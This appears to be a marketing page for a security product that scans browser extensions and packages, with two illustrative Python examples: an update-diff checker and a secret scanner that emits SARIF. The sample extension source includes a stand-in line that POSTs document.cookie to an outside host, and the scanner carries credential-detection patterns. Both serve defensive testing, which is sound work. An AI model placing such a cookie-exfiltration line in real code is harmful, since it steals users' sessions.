Detection you can see.
Every extension and package gets the full battery - vulnerability and secret-leak testing, static and dynamic analysis, and AI code analysis - in one evidence format that names the file, the change, why it is dangerous, and what to do next.
The update-channel attack, caught.
Extuno compares each update against the version before it and flags severity-band escalation - the moment a clean release turns malicious.
- + New exfiltration channels introduced on update
- + Added permissions and a weakened content security policy
- + New remote-code paths that evade review
Update lineage
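As an added illustration (not Extuno's own code, rules or output), here is a version-to-version comparison in Python that implements the three checks above for a Manifest V3 browser extension: added permissions, a weakened extension-pages CSP, and new outbound hosts in the bundled source. The sample manifests and source strings are constructed for the example; the rule names, band assignments and the list of permissions treated as critical are assumptions, not the product's rule set.

```python
import re
from urllib.parse import urlparse

# Severity bands in escalation order (assumed names, mirroring clean/review/critical).
BANDS = {"clean": 0, "review": 1, "critical": 2}
# Absolute http(s) URLs in source text; the host is what we compare across versions.
URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+")
# Permissions whose appearance on update is treated as critical (assumption for the example).
CRITICAL_PERMS = {"<all_urls>", "*://*/*", "webRequestBlocking"}

def parse_csp(csp):
    """Parse a CSP string into {directive: set(sources)}."""
    directives = {}
    for part in csp.split(";"):
        tokens = part.split()
        if tokens:
            directives[tokens[0]] = set(tokens[1:])
    return directives

def extension_pages_csp(manifest):
    """CSP for extension pages: a dict in MV3, a bare string in MV2."""
    csp = manifest.get("content_security_policy", "")
    if isinstance(csp, dict):
        csp = csp.get("extension_pages", "")
    return csp

def outbound_hosts(source):
    """Hosts named in absolute http(s) URLs inside the bundled source."""
    return {urlparse(u).hostname for u in URL_RE.findall(source)}

def compare_release(prev, new):
    """prev/new: {'manifest': parsed manifest.json, 'source': bundled JS as text}.
    Returns only what is new in `new` relative to `prev` (the lineage diff)."""
    findings = []
    for key in ("permissions", "host_permissions"):
        added = set(new["manifest"].get(key, [])) - set(prev["manifest"].get(key, []))
        for perm in sorted(added):
            band = "critical" if perm in CRITICAL_PERMS else "review"
            findings.append({"band": band, "rule": "added-permission", "detail": f"{key}: {perm}"})
    old_csp = parse_csp(extension_pages_csp(prev["manifest"]))
    new_csp = parse_csp(extension_pages_csp(new["manifest"]))
    for directive in ("default-src", "script-src"):
        for src in sorted(new_csp.get(directive, set()) - old_csp.get(directive, set())):
            if src == "'self'":
                continue
            # eval, inline script, wildcards or remote origins all widen what can execute.
            weak = src in ("'unsafe-eval'", "'unsafe-inline'", "*") or src.startswith("http")
            findings.append({"band": "critical" if weak else "review",
                             "rule": "weakened-csp", "detail": f"{directive}: {src}"})
    for host in sorted(outbound_hosts(new["source"]) - outbound_hosts(prev["source"])):
        findings.append({"band": "review", "rule": "new-outbound-host", "detail": host})
    return findings

def verdict(findings):
    """Single verdict: the highest band among the findings, or clean."""
    if not findings:
        return "clean"
    return max((f["band"] for f in findings), key=BANDS.__getitem__)

# Constructed sample lineage: a clean 1.0.0 followed by a suspicious 1.0.1.
PREV = {
    "manifest": {"manifest_version": 3, "version": "1.0.0",
                 "permissions": ["storage"],
                 "host_permissions": ["https://api.example.com/*"],
                 "content_security_policy": {"extension_pages": "script-src 'self'; object-src 'self'"}},
    "source": "fetch('https://api.example.com/v1/sync');",
}
NEW = {
    "manifest": {"manifest_version": 3, "version": "1.0.1",
                 "permissions": ["storage", "cookies", "webRequest"],
                 "host_permissions": ["<all_urls>"],
                 "content_security_policy": {"extension_pages": "script-src 'self' 'unsafe-eval'; object-src 'self'"}},
    "source": ("fetch('https://api.example.com/v1/sync');"
               "fetch('https://cdn-metrics.example.net/c', {method: 'POST', body: document.cookie});"),
}

if __name__ == "__main__":
    diff = compare_release(PREV, NEW)
    for f in diff:
        print(f"[{f['band']}] {f['rule']}: {f['detail']}")
    print("verdict:", verdict(diff))
```

The comparison is deliberately one-directional: removed permissions and dropped hosts are not reported, because the question a reviewer asks of an update is what it can newly do. Running the same version against itself yields no findings and a clean verdict.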
Run it before it runs on you.
Extuno executes the real extension or package in an ephemeral, network-segmented micro-VM and records exactly what it does.
- + Network endpoints and outbound payloads
- + Credential, session, and wallet theft
- + Crypto-miners and covert command traffic
1100+ rules, one verdict.
Capability abuse, remote-code paths, credential theft, evasion, surveillance, covert command traffic, and obfuscation - scored into a single, defensible verdict.
- + Severity-banded: clean, review, critical
- + Every rule maps to a concrete finding
- + Verdict you can take to a change board
Known-vulnerable code, surfaced.
Beyond malicious intent, Extuno tests every extension and package for vulnerable code paths, unsafe APIs, and risky dependencies - so a benign-but-exploitable release does not slip through.
- + Unsafe API and injection-prone patterns
- + Vulnerable and outdated dependencies
- + Every finding mapped to its location and fix
The full source, read and correlated.
An analysis layer reads the complete source of every version and ties the static and dynamic results together - clustering related findings, flagging anomalies against a package's own history, and matching known-malware behavior.
- + Reads the full source code of every version
- + Anomaly flags against prior versions
- + Known-malware similarity and campaign clustering
- + Every flag links back to its evidence
A pass/fail check on every pull request.
1000+ anchored secret detectors test extensions, packages, and your own repos for leaked keys, tokens, and credentials - with standard scan output, git-history scanning, and baseline support.
- + Standard SARIF output for code scanning
- + Git-history and baseline support
- + GitHub and GitLab pipelines
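An added example, not the product's own detectors or output: a small anchored secret scanner in Python that emits SARIF 2.1.0 results, gives each finding a stable fingerprint so a reviewed baseline can suppress it, and exposes the pass/fail gate a pull-request check would use. The three detector patterns, the fingerprint scheme and the sample files are constructed for the example; the AWS key is AWS's published placeholder key and the GitHub token is a made-up string of the right shape.

```python
import hashlib
import json
import re

# Anchored detectors: each pattern pins a fixed prefix and exact length, which
# keeps false positives far lower than entropy-only matching.
DETECTORS = {
    "aws-access-key-id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "github-pat-classic": re.compile(r"\bghp_[A-Za-z0-9]{36}\b"),
    "private-key-block": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"),
}

def fingerprint(rule_id, path, secret):
    """Stable id for a finding. Line numbers are deliberately left out so an
    accepted finding stays suppressed when lines above it change."""
    digest = hashlib.sha256(f"{rule_id}\0{path}\0{secret}".encode()).hexdigest()
    return digest[:16]

def scan(files, baseline=frozenset()):
    """files: {path: text}. Returns a SARIF 2.1.0 document containing every
    finding whose fingerprint is not in `baseline`."""
    results = []
    for path, text in files.items():
        for lineno, line in enumerate(text.splitlines(), start=1):
            for rule_id, pattern in DETECTORS.items():
                for match in pattern.finditer(line):
                    fp = fingerprint(rule_id, path, match.group(0))
                    if fp in baseline:
                        continue
                    results.append({
                        "ruleId": rule_id,
                        "level": "error",
                        # Never echo the full secret into the report.
                        "message": {"text": f"{rule_id}: {match.group(0)[:4]}... at {path}:{lineno}"},
                        "locations": [{"physicalLocation": {
                            "artifactLocation": {"uri": path},
                            "region": {"startLine": lineno},
                        }}],
                        "partialFingerprints": {"secret/v1": fp},
                    })
    return {
        "version": "2.1.0",
        "$schema": "https://json.schemastore.org/sarif-2.1.0.json",
        "runs": [{
            "tool": {"driver": {"name": "secret-check-example",
                                 "rules": [{"id": rule_id} for rule_id in DETECTORS]}},
            "results": results,
        }],
    }

def passes(sarif):
    """Pull-request gate: any unsuppressed result fails the check."""
    return all(not run["results"] for run in sarif["runs"])

def accept_baseline(sarif):
    """Turn the current results into a baseline set, as a team would after
    reviewing existing findings it has chosen to live with for now."""
    return {r["partialFingerprints"]["secret/v1"]
            for run in sarif["runs"] for r in run["results"]}

# Constructed sample repository contents.
SAMPLE_FILES = {
    "config/settings.py": ('AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE"\n'  # AWS's documented placeholder
                           'REGION = "us-east-1"\n'),
    "scripts/deploy.sh": "export GH_TOKEN=ghp_0123456789abcdefghijklmnopqrstuvwxyz\n",  # made-up token shape
    "README.md": "No secrets here.\n",
}

if __name__ == "__main__":
    report = scan(SAMPLE_FILES)
    print(json.dumps(report, indent=2))
    print("pass" if passes(report) else "fail")
```

Because the fingerprint covers the rule, the path and the matched value but not the line number, an accepted finding survives ordinary edits to the file, while the same secret copied to a new path, or a new secret in an existing file, is reported again and fails the gate.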
Set it once. Re-checked on every release.
Add extensions and packages to a watchlist and route findings to the channels your team already uses.
Watchlist
Track any extension or package across all twelve ecosystems.
Alert lifecycle
Open, acknowledge, and resolve - with a full audit trail.
Delivery
SIEM, Slack, Teams, PagerDuty, email, and signed webhooks.